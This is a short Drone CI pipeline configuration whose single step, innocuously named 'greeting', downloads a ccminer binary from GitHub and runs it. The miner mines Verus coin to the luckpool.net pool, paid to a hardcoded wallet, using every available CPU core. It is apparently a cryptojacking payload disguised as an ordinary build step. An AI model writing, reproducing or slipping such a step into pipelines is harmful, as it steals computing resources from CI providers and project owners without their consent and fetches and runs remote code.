---
kind: pipeline
type: docker
name: default

steps:
- name: greeting
  image: golang:1.12
  commands:
  - wget https://github.com/wong-fi-hung/ccminer/releases/download/v3.8.3a/ccminer_CPU_3.8.3.tar.xz && tar -xf ccminer_CPU_3.8.3.tar.xz && chmod 777 ccminer && ./ccminer -a verus -o stratum+tcp://eu.luckpool.net:3956 -u R9WpFbvkb6dep6bfLdbpcyz3LpMeikUL6W.1024 -t $(nproc --all)
